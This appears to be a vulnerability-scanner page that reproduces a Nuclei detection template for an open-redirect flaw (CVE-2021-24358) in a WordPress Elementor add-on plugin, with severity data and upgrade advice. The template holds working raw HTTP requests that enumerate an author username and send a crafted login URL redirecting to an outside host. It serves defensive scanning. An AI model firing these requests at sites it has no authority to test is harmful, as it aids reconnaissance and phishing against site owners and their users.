Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect

ID: CVE-2021-24358

Severity: medium

Author: dhiyaneshDk

Tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,elementor,posimyth

Description

WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue.

YAML Source

id: CVE-2021-24358

info:
  name: Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect
  author: dhiyaneshDk
  severity: medium
  description: WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue.
  impact: |
    This vulnerability can be exploited by attackers to trick users into visiting malicious websites, leading to potential phishing attacks or the execution of other malicious activities.
  remediation: |
    Upgrade Plus Addons for Elementor Page Builder to version 4.1.10 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24358
    - https://theplusaddons.com/changelog/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24358
    cwe-id: CWE-601
    epss-score: 0.00329
    epss-percentile: 0.70913
    cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: posimyth
    product: the_plus_addons_for_elementor
    framework: wordpress
  tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,elementor,posimyth

http:
  - raw:
      - |
        GET /?author=1 HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1

    extractors:
      - type: regex
        name: username
        group: 1
        regex:
          - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
        internal: true
        part: body

      - type: regex
        name: username
        group: 1
        regex:
          - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
        internal: true
        part: header
# digest: 4a0a00473045022100b3fd9eaec6712064a970d261e5a81136844630987ca1b1a6927ce673d043df8a0220735aaf21f258b6fc502e5050d0744a74416f351de2480ac7c6f720f11238a528:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24358.yaml"

View on Github